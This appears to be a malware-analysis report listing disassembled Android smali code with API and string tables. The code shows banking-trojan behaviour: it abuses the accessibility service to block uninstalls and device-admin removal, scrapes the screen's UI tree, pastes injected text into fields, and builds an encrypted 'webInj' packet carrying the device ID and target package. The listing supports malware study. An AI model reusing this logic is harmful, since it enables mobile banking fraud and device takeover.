                        116invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        117move-result-object v0
                        119invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        120cond_a0:
                        121iget-object v0, p0, Lcom/lib;->timeout:Ljava/lang/Integer;
                        123invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
                        124move-result v0
                        125mul-int/lit16 v0, v0, 0x3e8
                        126int-to-long v4, v0
                        128invoke-static {v4, v5}, Ljava/lang/Thread;->sleep(J)V
                        129try_end_ac: goto/16 :goto_3a
                        130catch_ad: move-exception v0
                        131new-instance v2, Ljava/lang/StringBuilder;
                        133invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        135const-string v3, "[log] [doInBackground] log T: "
                        137invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        138move-result-object v2
                        140invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        141move-result-object v0
                        143invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        144move-result-object v0
                        146invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        147cond_c4: move v0, v1
                        148goto/16 :goto_14
                        149cond_c7: move-object v2, v0
                        150goto/16 :goto_2c
                        APIs
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • android.view.accessibility.AccessibilityEvent.getEventType
                        • android.view.accessibility.AccessibilityEvent.getText
                        • android.view.accessibility.AccessibilityEvent.getText
                        • java.lang.Object.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.String.matches
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • java.lang.CharSequence.toString
                        • java.lang.String.matches
                        • android.view.accessibility.AccessibilityEvent.getClassName
                        • java.lang.CharSequence.toString
                        • java.lang.String.equals
                        • android.view.accessibility.AccessibilityEvent.getClassName
                        • java.lang.CharSequence.toString
                        • java.lang.String.equals
                        • android.view.accessibility.AccessibilityEvent.getClassName
                        • java.lang.CharSequence.toString
                        • java.lang.String.equals
                        • android.accessibilityservice.AccessibilityService.getRootInActiveWindow
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • .*
                        • (com.google.android.packageinstaller|com.android.packageinstaller|com.android.settings)
                        • android.app.AlertDialog
                        • com.android.packageinstaller.UninstallerActivity
                        • com.android.settings.DeviceAdminAdd
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2sget-boolean v1, Lcom/lib;->needUnDelete:Z
                        3if-eqz v1, :cond_78
                        5invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        6move-result-object v1
                        7if-eqz v1, :cond_78
                        9invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getEventType()I
                        10move-result v1
                        11const/4 v2, 0x1
                        12if-ne v1, v2, :cond_51
                        14invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getText()Ljava/util/List;
                        15move-result-object v1
                        16if-eqz v1, :cond_51
                        18invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getText()Ljava/util/List;
                        19move-result-object v1
                        21invoke-virtual {v1}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        22move-result-object v1
                        23new-instance v2, Ljava/lang/StringBuilder;
                        25invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        27const-string v3, ".*"
                        29invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        30move-result-object v2
                        32sget-object v3, Lcom/lib;->selfAppName:Ljava/lang/String;
                        34invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        35move-result-object v2
                        37const-string v3, ".*"
                        39invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        40move-result-object v2
                        42invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        43move-result-object v2
                        45invoke-virtual {v1, v2}, Ljava/lang/String;->matches(Ljava/lang/String;)Z
                        46move-result v1
                        47if-eqz v1, :cond_51
                        49invoke-virtual {p0, p1}, Lcom/lib;->parseEvent(Landroid/view/accessibility/AccessibilityEvent;)Lorg/json/JSONObject;
                        51invoke-direct {p0}, Lcom/lib;->makeBack()Z
                        52move-result v0
                        53sget v1, Landroid/os/Build$VERSION;->SDK_INT:I
                        54const/16 v2, 0x17
                        55if-ge v1, v2, :cond_51
                        57invoke-direct {p0}, Lcom/lib;->makeBack()Z
                        58cond_51:
                        59invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        60move-result-object v1
                        62invoke-interface {v1}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        63move-result-object v1
                        65const-string v2, "(com.google.android.packageinstaller|com.android.packageinstaller|com.android.settings)"
                        67invoke-virtual {v1, v2}, Ljava/lang/String;->matches(Ljava/lang/String;)Z
                        68move-result v1
                        69if-eqz v1, :cond_78
                        71invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getClassName()Ljava/lang/CharSequence;
                        72move-result-object v1
                        74invoke-interface {v1}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        75move-result-object v1
                        77const-string v2, "android.app.AlertDialog"
                        79invoke-virtual {v1, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        80move-result v1
                        81if-eqz v1, :cond_79
                        83invoke-virtual {p0, p1}, Lcom/lib;->parseEvent(Landroid/view/accessibility/AccessibilityEvent;)Lorg/json/JSONObject;
                        85invoke-direct {p0}, Lcom/lib;->makeBack()Z
                        86move-result v0
                        87goto_78: return v0
                        88cond_79:
                        89invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getClassName()Ljava/lang/CharSequence;
                        90move-result-object v1
                        92invoke-interface {v1}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        93move-result-object v1
                        95const-string v2, "com.android.packageinstaller.UninstallerActivity"
                        97invoke-virtual {v1, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        98move-result v1
                        99if-nez v1, :cond_99
                        101invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getClassName()Ljava/lang/CharSequence;
                        102move-result-object v1
                        104invoke-interface {v1}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        105move-result-object v1
                        107const-string v2, "com.android.settings.DeviceAdminAdd"
                        109invoke-virtual {v1, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        110move-result v1
                        111if-eqz v1, :cond_78
                        112cond_99:
                        113sget-object v1, Lcom/lib;->a11yService:Landroid/accessibilityservice/AccessibilityService;
                        115invoke-virtual {v1}, Landroid/accessibilityservice/AccessibilityService;->getRootInActiveWindow()Landroid/view/accessibility/AccessibilityNodeInfo;
                        116move-result-object v1
                        117new-instance v2, Ljava/lang/StringBuilder;
                        119invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        121const-string v3, ".*"
                        123invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        124move-result-object v2
                        126sget-object v3, Lcom/lib;->selfAppName:Ljava/lang/String;
                        128invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        129move-result-object v2
                        131const-string v3, ".*"
                        133invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        134move-result-object v2
                        136invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        137move-result-object v2
                        139invoke-direct {p0, v1, v2}, Lcom/lib;->getElementByText(Landroid/view/accessibility/AccessibilityNodeInfo;Ljava/lang/String;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        140move-result-object v1
                        141if-eqz v1, :cond_78
                        143invoke-virtual {p0, p1}, Lcom/lib;->parseEvent(Landroid/view/accessibility/AccessibilityEvent;)Lorg/json/JSONObject;
                        145invoke-direct {p0}, Lcom/lib;->makeBack()Z
                        146move-result v0
                        147goto/16 :goto_78
                        Cross References
                        APIs
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChildCount
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • android.view.accessibility.AccessibilityNodeInfo.getContentDescription
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • android.view.accessibility.AccessibilityNodeInfo.getContentDescription
                        • java.lang.CharSequence.toString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • android.view.accessibility.AccessibilityNodeInfo.getContentDescription
                        • java.lang.CharSequence.toString
                        • java.lang.String.matches
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • android.view.accessibility.AccessibilityNodeInfo.getChildCount
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • java.lang.Integer.intValue
                        • java.lang.Integer.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [Text] getElementByDesc:
                        • getElementByDesc[T]:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v1, 0x0
                        2const/4 v0, 0x0
                        3try_start_2:
                        4invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        5move-result-object v0
                        6move-object v2, v0
                        7goto_7:
                        8invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        9move-result v0
                        11invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChildCount()I
                        12move-result v3
                        13if-ge v0, v3, :cond_a6
                        15invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        16move-result v0
                        18invoke-virtual {p1, v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        19move-result-object v0
                        21invoke-virtual {v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getContentDescription()Ljava/lang/CharSequence;
                        22move-result-object v0
                        23if-eqz v0, :cond_64
                        24new-instance v0, Ljava/lang/StringBuilder;
                        26invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        28const-string v3, "[Text] getElementByDesc: "
                        30invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        31move-result-object v0
                        33invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        34move-result v3
                        36invoke-virtual {p1, v3}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        37move-result-object v3
                        39invoke-virtual {v3}, Landroid/view/accessibility/AccessibilityNodeInfo;->getContentDescription()Ljava/lang/CharSequence;
                        40move-result-object v3
                        42invoke-interface {v3}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        43move-result-object v3
                        45invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        46move-result-object v0
                        48invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        49move-result-object v0
                        51invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        53invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        54move-result v0
                        56invoke-virtual {p1, v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        57move-result-object v0
                        59invoke-virtual {v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getContentDescription()Ljava/lang/CharSequence;
                        60move-result-object v0
                        62invoke-interface {v0}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        63move-result-object v0
                        65invoke-virtual {v0, p2}, Ljava/lang/String;->matches(Ljava/lang/String;)Z
                        66move-result v0
                        67if-eqz v0, :cond_64
                        69invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        70move-result v0
                        72invoke-virtual {p1, v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        73move-result-object v0
                        74goto_63: return-object v0
                        75cond_64:
                        76invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        77move-result v0
                        79invoke-virtual {p1, v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        80move-result-object v0
                        82invoke-virtual {v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChildCount()I
                        83move-result v0
                        84if-lez v0, :cond_80
                        86invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        87move-result v0
                        89invoke-virtual {p1, v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        90move-result-object v0
                        92invoke-direct {p0, v0, p2}, Lcom/lib;->getElementByDesc(Landroid/view/accessibility/AccessibilityNodeInfo;Ljava/lang/String;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        93move-result-object v0
                        94if-nez v0, :cond_63
                        95cond_80:
                        96invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        97move-result v0
                        98add-int/lit8 v0, v0, 0x1
                        100invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        101try_end_89: move-result-object v0
                        102move-object v2, v0
                        103goto/16 :goto_7
                        104catch_8d: move-exception v0
                        105new-instance v2, Ljava/lang/StringBuilder;
                        107invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        109const-string v3, "getElementByDesc[T]: "
                        111invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        112move-result-object v2
                        114invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        115move-result-object v0
                        117invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        118move-result-object v0
                        120invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        121move-object v0, v1
                        122goto/16 :goto_63
                        123cond_a6: move-object v0, v1
                        124goto/16 :goto_63
                        Cross References
                        APIs
                        • org.json.JSONArray.<init>
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChildCount
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • org.json.JSONObject.<init>
                        • org.json.JSONObject.put
                        • android.view.accessibility.AccessibilityNodeInfo.getClassName
                        • org.json.JSONObject.put
                        • android.view.accessibility.AccessibilityNodeInfo.getText
                        • android.view.accessibility.AccessibilityNodeInfo.getText
                        • java.lang.CharSequence.toString
                        • org.json.JSONObject.put
                        • android.view.accessibility.AccessibilityNodeInfo.getViewIdResourceName
                        • org.json.JSONObject.put
                        • android.view.accessibility.AccessibilityNodeInfo.isEnabled
                        • org.json.JSONObject.put
                        • android.view.accessibility.AccessibilityNodeInfo.isClickable
                        • org.json.JSONObject.put
                        • android.view.accessibility.AccessibilityNodeInfo.getChildCount
                        • org.json.JSONObject.put
                        • org.json.JSONArray.put
                        • java.lang.Integer.intValue
                        • java.lang.Integer.valueOf
                        • org.json.JSONObject.put
                        Strings
                        • #
                        • nodeClass
                        • nodeText
                        • ID
                        • isEnabled
                        • isClickable
                        • child
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v1, Lorg/json/JSONArray;
                        3invoke-direct {v1}, Lorg/json/JSONArray;-><init>()V
                        4const/4 v0, 0x0
                        5try_start_6:
                        6invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        7move-result-object v0
                        8goto_a:
                        9invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
                        10move-result v2
                        12invoke-virtual {p0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChildCount()I
                        13move-result v3
                        14if-ge v2, v3, :cond_83
                        16invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
                        17move-result v2
                        19invoke-virtual {p0, v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        20move-result-object v2
                        21new-instance v3, Lorg/json/JSONObject;
                        23invoke-direct {v3}, Lorg/json/JSONObject;-><init>()V
                        25const-string v4, "#"
                        27invoke-virtual {v3, v4, v0}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        29const-string v4, "nodeClass"
                        31invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getClassName()Ljava/lang/CharSequence;
                        32move-result-object v5
                        34invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        36invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getText()Ljava/lang/CharSequence;
                        37move-result-object v4
                        38if-eqz v4, :cond_7a
                        40const-string v4, "nodeText"
                        42invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getText()Ljava/lang/CharSequence;
                        43move-result-object v5
                        45invoke-interface {v5}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        46move-result-object v5
                        48invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        49goto_42:
                        50const-string v4, "ID"
                        52invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getViewIdResourceName()Ljava/lang/String;
                        53move-result-object v5
                        55invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        57const-string v4, "isEnabled"
                        59invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->isEnabled()Z
                        60move-result v5
                        62invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
                        64const-string v4, "isClickable"
                        66invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->isClickable()Z
                        67move-result v5
                        69invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
                        71invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChildCount()I
                        72move-result v4
                        73if-lez v4, :cond_6c
                        75const-string v4, "child"
                        77invoke-static {v2}, Lcom/lib;->parseTree(Landroid/view/accessibility/AccessibilityNodeInfo;)Lorg/json/JSONArray;
                        78move-result-object v2
                        80invoke-virtual {v3, v4, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        81cond_6c:
                        82invoke-virtual {v1, v3}, Lorg/json/JSONArray;->put(Ljava/lang/Object;)Lorg/json/JSONArray;
                        84invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
                        85move-result v0
                        86add-int/lit8 v0, v0, 0x1
                        88invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        89move-result-object v0
                        90goto/16 :goto_a
                        91cond_7a:
                        92const-string v4, "nodeText"
                        94const-string v5, ""
                        96invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        97try_end_81: goto/16 :goto_42
                        98catch_82: move-exception v0
                        99cond_83: return-object v1
                        Cross References
                        APIs
                        • android.os.Bundle.<init>
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getString
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getString
                        • org.json.JSONObject.getString
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getInt
                        • java.lang.Integer.valueOf
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getString
                        • org.json.JSONObject.getString
                        • java.lang.Integer.parseInt
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.intValue
                        • java.lang.String.charAt
                        • java.lang.String.valueOf
                        • android.accessibilityservice.AccessibilityService.getBaseContext
                        • android.content.Context.getSystemService
                        • android.content.ClipData.newPlainText
                        • android.content.ClipboardManager.setPrimaryClip
                        • android.view.accessibility.AccessibilityNodeInfo.performAction
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • data
                        • var
                        • charPos
                        • posByVar
                        • clipboard
                        • PASTE:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v1, 0x0
                        2try_start_1:
                        3invoke-direct {p0, p1, p2}, Lcom/lib;->getElement(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        4move-result-object v3
                        5if-eqz v3, :cond_a8
                        6new-instance v0, Landroid/os/Bundle;
                        8invoke-direct {v0}, Landroid/os/Bundle;-><init>()V
                        9const/4 v0, 0x0
                        11const-string v2, "data"
                        13invoke-virtual {p2, v2}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        14move-result v2
                        15if-nez v2, :cond_1b
                        17const-string v0, "data"
                        19invoke-virtual {p2, v0}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        20move-result-object v0
                        21cond_1b:
                        22const-string v2, "var"
                        24invoke-virtual {p2, v2}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        25move-result v2
                        26if-nez v2, :cond_2f
                        28sget-object v0, Lcom/lib;->grabBuffer:Lorg/json/JSONObject;
                        30const-string v2, "var"
                        32invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        33move-result-object v2
                        35invoke-virtual {v0, v2}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        36move-result-object v0
                        37cond_2f: if-nez v0, :cond_33
                        38move v0, v1
                        39goto_32: return v0
                        40cond_33:
                        41const-string v2, "charPos"
                        43invoke-virtual {p2, v2}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        44move-result v2
                        45if-nez v2, :cond_aa
                        47const-string v2, "charPos"
                        49invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        50move-result v2
                        52invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        53move-result-object v2
                        55const-string v4, "posByVar"
                        57invoke-virtual {p2, v4}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        58move-result v4
                        59if-nez v4, :cond_61
                        61sget-object v2, Lcom/lib;->grabBuffer:Lorg/json/JSONObject;
                        63const-string v4, "posByVar"
                        65invoke-virtual {p2, v4}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        66move-result-object v4
                        68invoke-virtual {v2, v4}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        69move-result-object v2
                        71invoke-static {v2}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I
                        72move-result v2
                        74invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        75move-result-object v2
                        76cond_61:
                        77invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        78move-result v2
                        79add-int/lit8 v2, v2, -0x1
                        81invoke-virtual {v0, v2}, Ljava/lang/String;->charAt(I)C
                        82move-result v0
                        84invoke-static {v0}, Ljava/lang/String;->valueOf(C)Ljava/lang/String;
                        85move-result-object v0
                        86move-object v2, v0
                        87goto_70:
                        88sget-object v0, Lcom/lib;->a11yService:Landroid/accessibilityservice/AccessibilityService;
                        90invoke-virtual {v0}, Landroid/accessibilityservice/AccessibilityService;->getBaseContext()Landroid/content/Context;
                        91move-result-object v0
                        93const-string v4, "clipboard"
                        95invoke-virtual {v0, v4}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        96move-result-object v0
                        97check-cast v0, Landroid/content/ClipboardManager;
                        99const-string v4, ""
                        101invoke-static {v4, v2}, Landroid/content/ClipData;->newPlainText(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Landroid/content/ClipData;
                        102move-result-object v2
                        104invoke-virtual {v0, v2}, Landroid/content/ClipboardManager;->setPrimaryClip(Landroid/content/ClipData;)V
                        105const v0, 0x8000
                        107invoke-virtual {v3, v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->performAction(I)Z
                        108try_end_8d: move-result v0
                        109goto/16 :goto_32
                        110catch_8f: move-exception v0
                        111new-instance v2, Ljava/lang/StringBuilder;
                        113invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        115const-string v3, "PASTE: "
                        117invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        118move-result-object v2
                        120invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        121move-result-object v0
                        123invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        124move-result-object v0
                        126invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        127move v0, v1
                        128goto/16 :goto_32
                        129cond_a8: move v0, v1
                        130goto/16 :goto_32
                        131cond_aa: move-object v2, v0
                        132goto/16 :goto_70
                        Cross References
                        APIs
                        • org.json.JSONObject.<init>
                        • java.lang.String.<init>
                        • org.json.JSONObject.<init>
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • java.util.Locale.getDefault
                        • java.util.Locale.getLanguage
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • java.util.List.get
                        • org.json.JSONObject.toString
                        • java.lang.String.getBytes
                        • java.lang.StringBuilder.<init>
                        • java.util.List.get
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.util.Base64.encodeToString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • UID
                        • package
                        • lng
                        • stopWord
                        • reason
                        • webInj
                        • data
                        • [func] [makeWebInjPacket] T:
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v1, Lorg/json/JSONObject;
                        3invoke-direct {v1}, Lorg/json/JSONObject;-><init>()V
                        4new-instance v0, Ljava/lang/String;
                        6invoke-direct {v0}, Ljava/lang/String;-><init>()V
                        7try_start_a: new-instance v0, Lorg/json/JSONObject;
                        9invoke-direct {v0}, Lorg/json/JSONObject;-><init>()V
                        11const-string v2, "UID"
                        13invoke-virtual {p0, p1}, Lcom/lib;->getUID(Landroid/content/Context;)Ljava/lang/String;
                        14move-result-object v3
                        16invoke-virtual {v0, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        18const-string v2, "package"
                        20invoke-virtual {v0, v2, p2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        22const-string v2, "lng"
                        24invoke-static {}, Ljava/util/Locale;->getDefault()Ljava/util/Locale;
                        25move-result-object v3
                        27invoke-virtual {v3}, Ljava/util/Locale;->getLanguage()Ljava/lang/String;
                        28move-result-object v3
                        30invoke-virtual {v0, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        32const-string v2, "stopWord"
                        34invoke-virtual {v0, v2, p3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        36const-string v2, "reason"
                        38const-string v3, "webInj"
                        40invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        42const-string v2, "data"
                        44invoke-virtual {v1, v2, v0}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        46iget-object v0, p0, Lcom/lib;->gateKey:Ljava/lang/String;
                        48invoke-virtual {p0, v0}, Lcom/lib;->curve25519GetShared(Ljava/lang/String;)Ljava/util/List;
                        49move-result-object v2
                        50const/4 v0, 0x0
                        52invoke-interface {v2, v0}, Ljava/util/List;->get(I)Ljava/lang/Object;
                        53move-result-object v0
                        54check-cast v0, [B
                        56invoke-virtual {p0, v0}, Lcom/lib;->bytesToHex([B)Ljava/lang/String;
                        57move-result-object v0
